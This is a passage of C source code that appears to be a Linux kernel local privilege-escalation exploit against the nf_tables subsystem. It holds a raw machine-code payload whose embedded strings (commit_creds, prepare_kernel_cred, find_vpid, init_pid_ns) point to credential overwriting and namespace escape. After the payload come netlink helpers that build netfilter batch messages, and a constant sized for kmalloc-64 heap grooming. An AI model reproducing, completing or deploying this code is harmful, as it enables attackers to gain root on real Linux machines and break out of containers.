0xe8, 0xe3, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xcf, 0x00,
0x00, 0x00, 0x49, 0x89, 0xc7, 0x48, 0x63, 0x18, 0x48, 0x8d, 0x35, 0x7d,
0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0xc2, 0x00,
0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, 0x00, 0x00, 0x49,
0x01, 0xdf, 0x49, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0,
0x4c, 0x63, 0x10, 0x49, 0x01, 0xc2, 0x49, 0x8d, 0x8f, 0xa0, 0x00, 0x00,
0x00, 0x4c, 0x89, 0xfa, 0x48, 0x39, 0xca, 0x0f, 0x83, 0x88, 0x00, 0x00,
0x00, 0x48, 0x8b, 0x02, 0x4c, 0x39, 0xc0, 0x73, 0x06, 0x48, 0x83, 0xc2,
0x08, 0xeb, 0xe9, 0x48, 0x8d, 0xb0, 0x00, 0x30, 0x00, 0x00, 0x48, 0x89,
0xc7, 0x48, 0x39, 0xf7, 0x73, 0xeb, 0x48, 0x39, 0x07, 0x48, 0x8d, 0x7f,
0x08, 0x75, 0xf2, 0x48, 0x85, 0xc0, 0x74, 0x5d, 0x6a, 0x01, 0x41, 0x5c,
0x49, 0x89, 0xc3, 0x49, 0x39, 0xf3, 0x73, 0x51, 0x4d, 0x8b, 0x0b, 0x4d,
0x39, 0xc1, 0x72, 0x34, 0x4c, 0x39, 0xc8, 0x74, 0x2f, 0x49, 0x8d, 0x49,
0x60, 0x31, 0xd2, 0x31, 0xdb, 0x4c, 0x89, 0xcf, 0x48, 0x39, 0xcf, 0x73,
0x1f, 0x48, 0x8b, 0x2f, 0x4c, 0x39, 0xfd, 0x41, 0x0f, 0x44, 0xd4, 0x4c,
0x39, 0xd5, 0x41, 0x0f, 0x44, 0xdc, 0x48, 0x83, 0xc7, 0x08, 0x85, 0xdb,
0x74, 0xe2, 0x85, 0xd2, 0x74, 0xde, 0xeb, 0x06, 0x49, 0x83, 0xc3, 0x08,
0xeb, 0xb9, 0x4d, 0x85, 0xc9, 0x74, 0x0a, 0x4c, 0x89, 0xc9, 0x48, 0x29,
0xc1, 0x4d, 0x89, 0x0c, 0x0e, 0x31, 0xc0, 0x5b, 0x41, 0x5c, 0x41, 0x5e,
0x41, 0x5f, 0x5d, 0xc3, 0x53, 0x49, 0x89, 0xd0, 0x49, 0xf7, 0xd8, 0x41,
0xb9, 0x00, 0x00, 0x00, 0x02, 0x31, 0xc0, 0x49, 0x89, 0xfb, 0x4e, 0x8d,
0x14, 0x07, 0x4d, 0x01, 0xca, 0x4d, 0x39, 0xd3, 0x77, 0x50, 0x31, 0xc9,
0x48, 0x39, 0xca, 0x74, 0x13, 0x41, 0x8a, 0x1c, 0x0b, 0x3a, 0x1c, 0x0e,
0x75, 0x05, 0x48, 0xff, 0xc1, 0xeb, 0xed, 0x49, 0xff, 0xc3, 0xeb, 0xe1,
0x4d, 0x85, 0xdb, 0x74, 0x31, 0x49, 0x01, 0xf9, 0x48, 0x83, 0xe7, 0xfc,
0x4c, 0x39, 0xcf, 0x73, 0x13, 0x8b, 0x0f, 0x4c, 0x89, 0xdb, 0x48, 0x29,
0xcb, 0x48, 0x39, 0xfb, 0x74, 0x11, 0x48, 0x83, 0xc7, 0x04, 0xeb, 0xe8,
0x49, 0x01, 0xd3, 0x4d, 0x29, 0xd9, 0x4c, 0x89, 0xdf, 0xeb, 0xab, 0x48,
0x83, 0xc7, 0xfc, 0x48, 0x89, 0xf8, 0x5b, 0xc3, 0x63, 0x6f, 0x6d, 0x6d,
0x69, 0x74, 0x5f, 0x63, 0x72, 0x65, 0x64, 0x73, 0x00, 0x70, 0x72, 0x65,
0x70, 0x61, 0x72, 0x65, 0x5f, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x5f,
0x63, 0x72, 0x65, 0x64, 0x00, 0x66, 0x69, 0x6e, 0x64, 0x5f, 0x76, 0x70,
0x69, 0x64, 0x00, 0x70, 0x69, 0x64, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x70, 0x69, 0x64, 0x5f, 0x6e, 0x73, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x75, 0x74, 0x73, 0x5f, 0x6e, 0x73, 0x00};

// ---------------------------------- netlink --------------------------------------
// Netlink messages
#define NETLINK_RECEIVE_BUFFER_SIZE 4096

// Netlink attributes
#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)
#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + S8_NLA_SIZE)

// get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
struct nlmsghdr *get_batch_begin_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
struct nfgenmsg *nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
nlh->nlmsg_seq = 0;

// Used to access to the netfilter tables subsystem
nfgm->res_id = NFNL_SUBSYS_NFTABLES;

return nlh;
}

// get_batch_end_nlmsg(): Construct a BATCH_END message for the netfilter netlink
struct nlmsghdr *get_batch_end_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_END;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = NLM_F_REQUEST;
nlh->nlmsg_seq = 0;

return nlh;
}

// set_nested_attr(): Prepare a nested netlink attribute
struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
attr->nla_type = type;
attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
return (void *)attr + sizeof(struct nlattr);
}

// set_u32_attr(): Prepare an integer netlink attribute
struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
attr->nla_type = type;
attr->nla_len = U32_NLA_SIZE;
*(uint32_t *)NLA_ATTR(attr) = htonl(value);

return (void *)attr + U32_NLA_SIZE;
}

// set_u64_attr(): Prepare a 64 bits integer netlink attribute
struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
attr->nla_type = type;
attr->nla_len = U64_NLA_SIZE;
*(uint64_t *)NLA_ATTR(attr) = htobe64(value);

return (void *)attr + U64_NLA_SIZE;
}

// set_str8_attr(): Prepare a 8 bytes long string netlink attribute
// @name: Buffer to copy into the attribute
struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
attr->nla_type = type;
attr->nla_len = S8_NLA_SIZE;
memcpy(NLA_ATTR(attr), name, 8);

return (void *)attr + S8_NLA_SIZE;
}

// set_binary_attr(): Prepare a byte array netlink attribute
// @buffer: Buffer with data to send
// @buffer_size: Size of the previous buffer
struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
attr->nla_type = type;
attr->nla_len = NLA_BIN_SIZE(buffer_size);
memcpy(NLA_ATTR(attr), buffer, buffer_size);

return (void *)attr + NLA_ALIGN(NLA_BIN_SIZE(buffer_size));
}

// ---------------------------------- nf_tables --------------------------------------
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize

const uint8_t zerobuf[0x40] = {0};